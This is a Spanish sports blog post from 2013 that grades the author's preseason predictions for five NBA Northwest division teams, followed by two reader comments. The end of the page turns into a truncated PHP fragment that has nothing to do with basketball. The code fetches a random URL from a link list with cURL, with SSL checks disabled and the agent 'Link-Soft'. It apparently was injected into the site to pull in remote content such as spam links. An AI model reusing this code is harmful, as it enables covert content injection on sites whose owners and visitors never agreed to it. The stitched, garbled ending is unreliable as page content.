Revisando los pronósticos 2013: Northwest

24 de March de 2013 por TheDeerHunter

OKLAHOMA CITY THUNDER

Análisis
Pronóstico:
Segundos del Oeste. Finalistas de conferencia.
Probabilidad de acierto: Alta
Calificación pronóstico: A-

En el escenario que imaginamos en este análisis a principio de curso los Lakers hubieran dominado la regular pero serían los Thunder quienes se llevarían el gato al agua para alcanzar la final de la NBA. Una vez allí, caerían nuevamente contra los vigentes campeones.

El planteamiento tenía su lógica pero tiene un punto de casual esa segunda posición que habitualmente han ocupado en la conferencia tras el derrumbamiento inicial de Lakers y el inesperado dominio de Spurs. Independientemente del puesto concreto en el que terminen la regular, los Thunder han dado argumentos sólidos como para considerarles principales candidatos al trono del Oeste, luego nuestro pronóstico era válido. En una hipotética final yo tampoco los descartaría para el anillo, aunque eso es harina de otro costal.

En su día mencionamos la apuesta continuista, frente a los ambiciosos refuerzos de sus rivales. Los Thunder terminaron renunciando al incuestionable talento de Harden pero los resultados no se han visto afectados. Es lo que tiene ser tan buenos y tan jóvenes. El desarrollo de Durant, Westbrook e Ibaka les garantiza seguir siendo gran potencia de la liga durante mucho tiempo. Veremos si es suficiente como para escalar el último peldaño que les queda. 

DENVER NUGGETS

Análisis
Pronóstico:
Por encima de las 50 victorias. Semifinales de conferencia.
Probabilidad de acierto: Alta
Calificación pronóstico: A-

Tremenda campaña de tapados la que se están marcando los Nuggets. Quintos ahora mismo en su conferencia marcharían segundos si estuvieran en el Este. A pesar de no haber tocado todavía la parte alta del cuadro impresiona el estado de forma con el que afrontan el tramo decisivo de la campaña. Uno de los principales rivales a evitar en primera ronda.

“Mucho y bueno” decíamos en su día. Son efectivamente uno de los equipos más profundos, con hasta 9 hombres capaces con minutos efectivos y peso específico. Gente como Jordan Hamilton, Mozgov o Anthony Randolph que para sí querrían muchos apenas cuentan porque no hay sitio para tantos. Los Nuggets apenas han notado los altibajos individuales normales con tanto partido en juego y en condiciones óptimas son capaces de doblegar a cualquiera. Son podio de la liga en puntos, rebotes y asistencias. Casi nada.

De lo que nos espera de aquí al final de campaña me puedo permitir el lujo de fusilar prácticamente el análisis inicial. Copio y pego: “Entretienen, anotan y encima ganan, un lujo para el espectador de la NBA. (…) Si se pusieran a defender, con la gran cantidad de recursos y variables que tienen podrían ser mucho más peligrosos.” Y efectivamente “es lo que les falta para dar el salto de aspirante a contendiente por el título.”

UTAH JAZZ

Análisis
Pronóstico:
Primera ronda de PO.
Probabilidad de acierto: Media-Baja
Calificación pronóstico: C-

Dados los antecedentes era lógico contar con ellos a priori para la postemporada. Durante las últimas tres décadas únicamente han faltado a la cita en apenas 5 ocasiones y dos de ellas con un balance igual o superior al 50% de victorias. Va en sus genes: clasificar para playoffs, competir dignamente sobre el 50% y amargar la velada al visitante de turno en el Energy Solutions Arena de Salt Lake City… y eso que nunca han sido una potencia incuestionable baloncestísticamente hablando.

Lamentablemente este año todo apunta a que no van a lograrlo. Una temporada digna, dentro de sus parámetros y de lo esperado no va a ser suficiente en el Oeste, donde normalmente el listón sube. Están entre los 16 mejores equipos de la liga en casi todos los parámetros medibles, pero ni por esas. El fichaje de Harden por Houston, la gran temporada de Warriors y la resurrección postrera de Lakers tienen buena parte de culpa. Su escasa efectividad lejos de casa y los malos resultados en el tramo decisivo, el resto.

Siendo honestos no es del todo justo exigirles que con esa plantilla compitan de tú a tú contra muchas potencias de alrededor, incluso alguna que permanece por debajo de ellos en la clasificación. Como apuntamos en el primer análisis, los Jazz mantienen ciertas carencias y ciertos desequilibrios que sólo podrán corregir con movimientos valientes desprendiéndose de alguna de sus perlas interiores. Mientras tanto su techo es primera ronda y este año seguramente ni eso.

PORTLAND TRAILBLAZERS

Análisis
Pronóstico:
Alrededor de 25 victorias.
Probabilidad de acierto: Nula
Calificación pronóstico: D-

Tirábamos con bala en las previsiones. Sobra decir que no gustaba nada el equipo con el que partían. Tampoco su técnico jefe inspiraba excesiva confianza. Al final, obviamente algunos nos equivocamos… aunque confieso que aún no termino de entender cómo es posible que este equipo haya rendido de esta guisa.

El origen del “gambazo” por encima de todo tiene dos nombres propios. Damian Lillard y Terry Stotts. El primero está haciendo un temporadón de Rookie of the Year sencillamente brutal. Los más freaks de las estadísticas podríais ponerlo en situación comparándolo con la de algunos RoY célebres. La impresión es que no habrán muchos precedentes del nivel, con esta capacidad de dirigir y de desnivelar partidos. Un señor base. De Stotts decíamos en su día que su currículum nos hablaba “de haber gestionado con más pena que gloria equipos en reconstrucción”. Desde luego este no es el caso y su gran mérito ha sido saber utilizar sus mimbres. Como ejemplo la libertad del propio Lillard (maliciosamente me hubiera gustado haber visto que hubiera hecho con él McMillan) o el caso Hickson, aquel que se comía los mocos en el banquillo de Kings.

Del resto pues lo que pensaba en su día. Aldridge es muy bueno, lo sabíamos, y sigo pensando que Batum es mejor de lo que demuestra. Se puede salvar a Matthews pero el banco es de largo lo peor de la liga. Sólo mirando el rendimiento de la segunda unidad es increíble el balance que acumulan.

Así pues, han juntado lo básico para poder construir de verdad. Si el año que viene mejoran el fondo de armario y continúan con este tino podrían volver a pelear plaza de postemporada. Una de las gratas sorpresas de este año.

MINNESOTA TIMBERWOLVES

Análisis
Pronóstico:
>50% victorias. 7ª-8ª plaza del Oeste.
Probabilidad de acierto: Nula
Calificación pronóstico: D

Podéis decir que me cubrí de gloria en mi particular serie de pronósticos. En mi defensa tendré que aludir aquello de que no mandé a mis naves a luchar contra los elementos, en este caso en forma de imaginativas maneras de romperse. La cuestión es que este año tampoco va a ser cuando me haga rico quemando mi dinero en apuestas deportivas, como tampoco podré dedicarme a la adivinatoria de ningún tipo.

Debo decir que sigo pensando que no iba desencaminado con algunos puntos básicos. Los Wolves molan. Triturados como han estado por las lesiones aún se puede disfrutar de algunas de sus refrescantes actuaciones. Lógicamente debían notar la ausencia de su jugador estrella, especialmente en ataque, si bien hay que decir que lo poco que hemos visto a Love hay ciertos detalles que no han terminado de oler bien. Ojalá que sea sólo producto de nuestra imaginación y del comprensible estado de forma de este excelente jugador.

Creo firmemente que en condiciones normales tienen equipo para estar entre los 8 primeros del Oeste. No lo digo por Roy, con el que muy pocos contábamos, pero sí hemos visto un gran rendimiento de Pekovic, Kirilenko, Shved… como también posteriormente de Ricky cuando ha ido cogiendo el tono, y de Derrick Williams y Cunningham ganando enteros bajo su batuta. Tampoco olvidemos lo fuerte que había empezado Budinger aunque sólo pudiera ser en un puñado de partidos.

Decía Ricky que Adelman les había puesto como espejo a los Warriors del año pasado. Temporada a la basura en cuanto a resultados, sí, pero que no lo sea en el resto de aspectos. Que les sirva para crecer. Así sea.

Comenta

2 comentarios a esta entrada

  1. Esteban dice:
    #1

    se cayeron en el utlimo mes los jazz, sino mi pronostico era 100% acertado caray

      Citar

  2. melo15 dice:
    #2

    Gran temporada de OCK, yo pensaba que la baja de Harden se iba a notar mas, aunque creo que en PO lo van a pasar bastante mal. Juegan demasiadas isolation y eso en PO, con las defensas mas centradas se puede notar.
    Creo que ni a Utah ni a Portland les interesa clasificarse a PO.
    En primer lugar, los Jazz necesitan hacer un par de cambios, para empezar necesitan exteriores de calidad.
    Para esto tienen que traspasar a uno de sus interiores y despues podrian escoger en el Draft a un base: Trey Burke seria la mejor opcion pero Carter-Williams tambien les iria de perlas.

    A Portland tambien les vendria muy bien uno de los escoltas o aleros de este Draft: McAdoo, Sulaimon o Gary Harris serian muy buenas opciones, sobre todo el escolta de los Spartans.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>